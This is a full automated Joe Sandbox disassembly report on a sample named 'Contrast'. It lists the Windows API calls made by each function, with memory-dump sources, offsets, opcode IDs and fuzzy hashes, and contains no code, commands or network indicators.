                                                                                                                                          • Part of subcall function 00534CCA: _flsall.LIBCMT ref: 00534CE3
                                                                                                                                        • __setmode.LIBCMT ref: 00530C4E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 521402451-0
                                                                                                                                        • Opcode ID: 7445541440747c5a30e2eee4c1b35e81b1d3dc34494109c3248079e296b1d30c
                                                                                                                                        • Instruction ID: a91a92bc04eb20418fc455842981017ff744029c0dd2a7460717dfd267006887
                                                                                                                                        • Opcode Fuzzy Hash: 7445541440747c5a30e2eee4c1b35e81b1d3dc34494109c3248079e296b1d30c
                                                                                                                                        • Instruction Fuzzy Hash: 0411277290420A6ADB08B7A4AC4FABEBF6DFF81320F100156F204571C2DF316D865BA1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00568D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568D3F
                                                                                                                                          • Part of subcall function 00568D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00568D49
                                                                                                                                          • Part of subcall function 00568D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D58
                                                                                                                                          • Part of subcall function 00568D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D5F
                                                                                                                                          • Part of subcall function 00568D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568D75
                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005692C1
                                                                                                                                        • _memcmp.LIBCMT ref: 005692E4
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0056931A
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00569321
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1592001646-0
                                                                                                                                        • Opcode ID: 35045c6b29b0ff6a51b4a94e36ef5f8f698dcb011ff2abdbf86dc17e491bee71
                                                                                                                                        • Instruction ID: 91e270f9c271611ca558899eaa67f3de183d2c3b60c4269358abe7fc608ae2c6
                                                                                                                                        • Opcode Fuzzy Hash: 35045c6b29b0ff6a51b4a94e36ef5f8f698dcb011ff2abdbf86dc17e491bee71
                                                                                                                                        • Instruction Fuzzy Hash: 2321AF71E40109EFDB10DFA4C949BEEBBB8FF54301F044459E844A7291D770AA09DBA0
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 005963BD
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005963D7
                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005963E5
                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005963F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                        • Opcode ID: d6bc622051cd5631762cec61bf2f8e966ea31bad14a4fe7a3d97421f9b00d3b1
                                                                                                                                        • Instruction ID: f69d7b5c7eeb7ee2d2171b4ae5b9826a6560e95a4a90a53800ba7d17baeeac8d
                                                                                                                                        • Opcode Fuzzy Hash: d6bc622051cd5631762cec61bf2f8e966ea31bad14a4fe7a3d97421f9b00d3b1
                                                                                                                                        • Instruction Fuzzy Hash: 87112231300415AFEB00AB24DC48FBA7BA8FF8A320F144518F816CB2D2DBB0AC44CB90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0056F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0056E46F,?,?,?,0056F262,00000000,000000EF,00000119,?,?), ref: 0056F867
                                                                                                                                          • Part of subcall function 0056F858: lstrcpyW.KERNEL32(00000000,?,?,0056E46F,?,?,?,0056F262,00000000,000000EF,00000119,?,?,00000000), ref: 0056F88D
                                                                                                                                          • Part of subcall function 0056F858: lstrcmpiW.KERNEL32(00000000,?,0056E46F,?,?,?,0056F262,00000000,000000EF,00000119,?,?), ref: 0056F8BE
                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0056F262,00000000,000000EF,00000119,?,?,00000000), ref: 0056E488
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,0056F262,00000000,000000EF,00000119,?,?,00000000), ref: 0056E4AE
                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0056F262,00000000,000000EF,00000119,?,?,00000000), ref: 0056E4E2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                        • String ID: cdecl
                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                        • Opcode ID: 318d39fef069cb9e2505aa34ddbf13fbdf3f053af8df40d22be18ebf578a0f43
                                                                                                                                        • Instruction ID: 9ea354aab0c02927a5e1dc12cdf2f8412e86102d84d7667ea78660926aa47e7e
                                                                                                                                        • Opcode Fuzzy Hash: 318d39fef069cb9e2505aa34ddbf13fbdf3f053af8df40d22be18ebf578a0f43
                                                                                                                                        • Instruction Fuzzy Hash: A011E23A201345AFCB25AF34DC4AD7E7BA8FF95350B40402AF806CB2A0EB319941D791
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00545331
                                                                                                                                          • Part of subcall function 0053593C: __FF_MSGBANNER.LIBCMT ref: 00535953
                                                                                                                                          • Part of subcall function 0053593C: __NMSG_WRITE.LIBCMT ref: 0053595A
                                                                                                                                          • Part of subcall function 0053593C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,?,00000004,?,?,00531003,?), ref: 0053597F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                        • Opcode ID: d78b2bad508cbbf535b9d60aca926879f6075b2896cf0808fa55684edf3bc915
                                                                                                                                        • Instruction ID: 3bc87afca3f72a44b6dcb2415f5ed9632dfc58c374a2be3e582c716c7504fd04
                                                                                                                                        • Opcode Fuzzy Hash: d78b2bad508cbbf535b9d60aca926879f6075b2896cf0808fa55684edf3bc915
                                                                                                                                        • Instruction Fuzzy Hash: 7D11E732505B1AAFCB352F74AC096AE3F94BF613A4F104D26F9489A192EF7089449790
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00574385
                                                                                                                                        • _memset.LIBCMT ref: 005743A6
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 005743F8
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00574401
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1157408455-0
                                                                                                                                        • Opcode ID: bea9dc968fbf7ebf9f1184ee110d3c832636d69d24603047574a77d03c02b78b
                                                                                                                                        • Instruction ID: 5a60aab5761a6dad9e3fab2c19a51eae8702aac0162765655faf4f61f245f233
                                                                                                                                        • Opcode Fuzzy Hash: bea9dc968fbf7ebf9f1184ee110d3c832636d69d24603047574a77d03c02b78b
                                                                                                                                        • Instruction Fuzzy Hash: EA11E7759012287AD7309BA5AC4DFEBBB7CEF45720F00459AF908E71C0D2744E809BA4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577E51,?,?,00000000), ref: 00524041
                                                                                                                                          • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577E51,?,?,00000000,?,?), ref: 00524065
                                                                                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00586A84
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00586A8F
                                                                                                                                        • _memmove.LIBCMT ref: 00586ABC
                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 00586AC7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1504782959-0
                                                                                                                                        • Opcode ID: 883f749d6e18529bd75fbb99cdac8b38f1e498da4f3f6afa351f0324617d04d7
                                                                                                                                        • Instruction ID: 73f0c81de4349c8a27b3ab5ddfd824a3635ff39c39a8ac873664f40e903919b5
                                                                                                                                        • Opcode Fuzzy Hash: 883f749d6e18529bd75fbb99cdac8b38f1e498da4f3f6afa351f0324617d04d7
                                                                                                                                        • Instruction Fuzzy Hash: D0114F7650010AAFCB04FBA4D94ADEEBBB8FF55310B144065F902A72A1DF30AE44DB91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 005116B4
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0054B93C
                                                                                                                                        • GetCursorPos.USER32(?), ref: 0054B946
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0054B951
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4127811313-0
                                                                                                                                        • Opcode ID: b8253e664d764d519137abd233d17ad07c147892f043283bed2cb3859845fa7e
                                                                                                                                        • Instruction ID: 3bee033d33c9a44fcf043a3fe931b2ff261f2857beb1bb8262655ec943572998
                                                                                                                                        • Opcode Fuzzy Hash: b8253e664d764d519137abd233d17ad07c147892f043283bed2cb3859845fa7e
                                                                                                                                        • Instruction Fuzzy Hash: F6114935A0041AAFDB10EF58C8899FE7BB8FB59301F400896EA01E7540D331AA95DBA5
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00569719
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0056972B
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00569741
                                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0056975C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 9b238afd167026f4c3c645871f935d274e502f70eb853acbf015ea926ae88342
                                                                                                                                        • Instruction ID: ee30427f0e65413c0f45f41cd5bf94b70cf1e6621d57c9b164e7aeea78304604
                                                                                                                                        • Opcode Fuzzy Hash: 9b238afd167026f4c3c645871f935d274e502f70eb853acbf015ea926ae88342
                                                                                                                                        • Instruction Fuzzy Hash: B4115A79900218FFEB10DF95CD84E9DBBB8FB49710F204091E900B7290D6716E50EB90
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00512163
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                        • Opcode ID: 3bcf6563ad3a3a6798741635f3dc57ea7024fcfb7cb0cc13700fd5e931147809
                                                                                                                                        • Instruction ID: 3b6252c273225cb4b00c341f10eb12ec0b02d357789b031618dfd6deb86b4273
                                                                                                                                        • Opcode Fuzzy Hash: 3bcf6563ad3a3a6798741635f3dc57ea7024fcfb7cb0cc13700fd5e931147809
                                                                                                                                        • Instruction Fuzzy Hash: DB115B72541549BFEB129F909C45EEA7FA9FF69354F050116FA0452160D731DCA0EBA0
                                                                                                                                        APIs
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005704EC,?,0057153F,?,00008000), ref: 0057195E
                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,005704EC,?,0057153F,?,00008000), ref: 00571983
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005704EC,?,0057153F,?,00008000), ref: 0057198D
                                                                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,005704EC,?,0057153F,?,00008000), ref: 005719C0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                        • Opcode ID: 3ed18b462f0cfead9fe2b88145949acdd980163a10ff7de10238cdfccc66e8c3
                                                                                                                                        • Instruction ID: 17c6a98a63a833b8978e41cf9faa7145e36b5591a4f3797978daaafb6ec4617e
                                                                                                                                        • Opcode Fuzzy Hash: 3ed18b462f0cfead9fe2b88145949acdd980163a10ff7de10238cdfccc66e8c3
                                                                                                                                        • Instruction Fuzzy Hash: B4117031D0091DDBCF009FE9E958AEDBF78FF19741F008045EA44B2280CB309551EB95
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0059E1EA
                                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0059E201
                                                                                                                                        • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0059E216
                                                                                                                                        • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0059E234
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1352324309-0
                                                                                                                                        • Opcode ID: a8ec76ab566ff63148192a29d3c4f0696d56811a80e905640c05dce22498ddd4
                                                                                                                                        • Instruction ID: b9018964b8c0c0dddcbe936db86d1fe7fc38cc025a6ad3ae2e526b6e4d223146
                                                                                                                                        • Opcode Fuzzy Hash: a8ec76ab566ff63148192a29d3c4f0696d56811a80e905640c05dce22498ddd4
                                                                                                                                        • Instruction Fuzzy Hash: 75113CB9205304DBEF20CF51DD0AB93BBACFB05B00F10895AA61696190D7B0E908ABA1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                        • Instruction ID: ca2443ecba68d1993ecceaf973a0504c4ae5b088091cd5c277a02d1596cb4fc0
                                                                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                        • Instruction Fuzzy Hash: 5701893A04814EBBCF126E84CC058EE3F22FB5D348B488915FA1869131C376C9B1AB81
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0059B956
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0059B96E
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0059B992
                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0059B9AD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                        • Opcode ID: bd6bbab6a15ce1ee67574362dd2e743979f05d06c9369fca7ffe6ba38fee2e74
                                                                                                                                        • Instruction ID: ebc86ab84f985adacbdc9c1613aed132a1baef29bc56570ca308fa4ca4927534
                                                                                                                                        • Opcode Fuzzy Hash: bd6bbab6a15ce1ee67574362dd2e743979f05d06c9369fca7ffe6ba38fee2e74
                                                                                                                                        • Instruction Fuzzy Hash: 0B1174B9D00209EFDB41CF98D984AEEBBF9FF59310F104156E914E3210D731AA659F90
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0059BCB6
                                                                                                                                        • _memset.LIBCMT ref: 0059BCC5
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005D8F20,005D8F64), ref: 0059BCF4
                                                                                                                                        • CloseHandle.KERNEL32 ref: 0059BD06
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
